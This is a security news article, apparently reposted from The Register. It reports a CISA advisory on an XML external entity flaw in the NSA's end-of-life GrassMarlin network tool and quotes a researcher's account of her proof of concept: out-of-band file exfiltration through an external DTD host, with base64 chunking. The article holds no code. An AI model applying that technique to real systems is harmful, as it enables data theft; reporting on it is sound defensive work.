Wednesday, April 29, 2026
Latest:

Threatshub.org sponsored-Post

The Register

CISA flags data-theft bug in NSA-built OT networking tool

TH Author

The Cybersecurity and Infrastructure Security Agency (CISA) is warning anyone who uses GrassMarlin, a tool developed by the National Security Agency (NSA), about a new vulnerability that attackers can use to snoop on sensitive information.

First reported by Grady DeRosa, senior industrial pentester at Dragos, the weak spot affects all versions of GrassMarlin, a tool developed and open-sourced by the NSA to support network security at critical infrastructure organizations, industrial control systems, and SCADA networks.

GrassMarlin went EOL in 2017, so there are no fixes in the works. CISA just recommends to ensure control systems and devices are not accessible via the open internet, firewalled networks and devices are isolated from business networks, and remote access is established securely.

CISA did not – in typical fashion – offer too many details regarding CVE-2026-6807 (5.5), but confirmed that successful exploits could lead to sensitive information being disclosed.

However, in an advisory published on Tuesday, it said: “The flaw stems from insufficient hardening of the XML parsing process.”

These types of attacks (CWE-611) affect products that process XML files. GrassMarlin primarily uses the XML format to save session files, using many files to save different kinds of data, including lists of nodes and edges, node positioning, colors, and session metadata, before bundling them into a ZIP archive and saving them using a .gm3 extension.

Often referred to as XML External Entity (XXE) attacks, these typically involve tricking a system owner into parsing a maliciously crafted XML file that has been tampered with to exfiltrate data.

This is a general overview of how XXE attacks play out. CISA did not define how CVE-2026-6807 could be exploited specifically.

Anna Quinn, penetration tester at Rapid7, however, worked up a public proof-of-concept exploit and posted it to GitHub.

“Looking at the code for Grassmarlin, I determined that the likely vulnerable parameters had to do with the XML files ingested when opening stored sessions,” Quinn wrote. “By crafting malicious requests I discovered I could induce an error in the message console within Grassmarlin. The cause and content of the error was properly stripped from all logs and output within Grassmarlin.

“However, OOB exfiltration of arbitrary files was possible by referencing an external host in the DTD. Some caveats did appear to apply, newer versions of Java could not be used on the system, meaning that Grassmarlin had to use the version of Java bundled in the installer. Additionally, many types of input would cause errors which would impede the exfil process. To bypass this, the content would be converted to base64 and then sent across multiple message chunks.”

In a separate post on LinkedIn, Quinn noted that the bug won’t pose too much of a threat to most organizations, and that it can only realistically be exploited via phishing – either between local users or external emails. ®

READ MORE HERE